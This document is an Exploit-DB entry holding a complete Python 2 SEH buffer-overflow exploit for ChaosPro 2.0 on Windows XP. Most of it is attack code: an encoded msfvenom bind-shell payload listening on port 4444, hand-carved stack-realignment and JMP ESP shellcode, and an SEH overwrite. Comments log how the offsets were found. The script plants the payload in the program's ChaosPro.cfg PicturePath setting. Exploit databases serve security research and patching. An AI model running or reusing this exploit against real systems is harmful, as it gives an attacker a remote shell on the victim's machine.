ChaosPro 2.0 - Buffer Overflow (SEH)

EDB-ID:

47551

CVE:

N/A


Author:

SYANiDE

Type:

local


Platform:

Windows

Date:

2019-10-28


# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM

#!/usr/bin/env python2
import os, sys


# sploit = "A"* 5000  ## Crash! 41414141 in SEH! via ProfilePath or PicturePath.  Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000  #  326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000  #  2705
# sploit = "A" * (2705 -  4 - 126)  # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16


################ Second stage ####################
sploit = "A"*16
#  msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)


################ First stage ####################

# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32   54               PUSH ESP
# 0012FF33   58               POP EAX
# 0012FF34   66:05 3C18       ADD AX,183C
# 0012FF38   50               PUSH EAX
# 0012FF39   5C               POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8


# target instruction to push onto stack at new ESP:  FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
#    0:	25 28 28 28 28       	and    eax,0x28282828
#    5:	25 47 47 47 47       	and    eax,0x47474747
#    a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
#    f:	2d 7f 01 01 01       	sub    eax,0x101017f
#   14:	2d 03 18 3e 3e       	sub    eax,0x3e3e1803
#   19:	50                   	push   eax
sploit += (
	"\x25\x28\x28\x28\x28"
	"\x25\x47\x47\x47\x47"
	"\x2d\x7f\x01\x7f\x7f"
	"\x2d\x7f\x01\x01\x01"
	"\x2d\x03\x18\x3e\x3e"
	"\x50"
) # 26 bytes

## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54   44               INC ESP
# 0012FF55   44               INC ESP
# 0012FF56   44               INC ESP
# 0012FF57   44               INC ESP
# 0012FF58   44               INC ESP
# 0012FF59   44               INC ESP
# 0012FF5A   44               INC ESP
# 0012FF5B   44               INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8

## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
#   0:	25 02 02 02 02       	and    eax,0x2020202
#   5:	25 51 51 51 51       	and    eax,0x51515151
#   a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
#   f:	2d 01 01 01 61       	sub    eax,0x61010101
#  14:	2d 64 08 6d 1f       	sub    eax,0x1f6d0864
#  19:	50                   	push   eax
sploit +=(
	"\x25\x02\x02\x02\x02"
	"\x25\x51\x51\x51\x51"
	"\x2d\x7f\x01\x7f\x7f"
	"\x2d\x01\x01\x01\x61"
	"\x2d\x64\x08\x6d\x1f"
	"\x50"
) # 26 bytes

## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C   POP ESP
sploit += "\x5c" # 1

sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)

################ RET from SEH: JMP SHORT - 126 ####################

sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44  |. 5F             POP EDI
# 00401B45  |> 5E             POP ESI
# 00401B46  \. C3             RETN
sploit += "\x44\x1b\x40\x00"


################ build the config ####################
## Running from just outside base directory of ChaosPro:

def ret_cfg(inp):
	# do it live in PicturePath
	cfg = """PicturePath %s""" % inp
	with open("chaospro\\ChaosPro.cfg",'w') as F:
		F.write(cfg)
		F.close()

ret_cfg(sploit)